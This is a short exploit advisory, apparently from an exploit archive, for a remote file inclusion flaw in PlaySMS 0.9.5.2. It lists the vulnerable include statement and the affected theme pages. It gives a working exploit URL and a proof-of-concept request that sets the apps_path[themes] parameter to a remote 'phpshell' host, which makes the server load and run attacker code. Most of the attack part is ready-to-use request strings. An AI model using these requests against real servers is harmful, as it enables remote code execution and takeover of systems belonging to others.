PlaySMS 0.9.5.2 <= Remote File Inclusion Vulnerability



EKU-ID: 931 CVE: OSVDB-ID:
Author: NoGe Published: 2011-09-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


=============================================================================================================
 
  [o] PlaySMS <= Remote File Inclusion Vulnerability
 
       Software : PlaySMS ver 0.9.5.2
       Vendor   : http://playsms.org/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/

=============================================================================================================

  [o] Vulnerability

       <?php include $apps_path['themes']."/".$themes_module."/header.php"; ?>

       affected all this files

       web/plugin/themes/default/page_forgot.php
       web/plugin/themes/default/page_login.php
       web/plugin/themes/default/page_noaccess.php
       web/plugin/themes/default/page_register.php
       web/plugin/themes/km2/page_noaccess.php
       web/plugin/themes/work2/page_forgot.php
       web/plugin/themes/work2/page_login.php
       web/plugin/themes/work2/page_noaccess.php
       web/plugin/themes/work2/page_register.php


  [o] Exploit

       http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]


  [o] PoC

       http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?

=============================================================================================================

  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
       aJe kaka11 matthews wishnusakti inc0mp13te martfella
       pizzyroot Genex H312Y noname tukulesto }^-^{

=============================================================================================================

  [o] September 05 2011 - Papua, Indonesia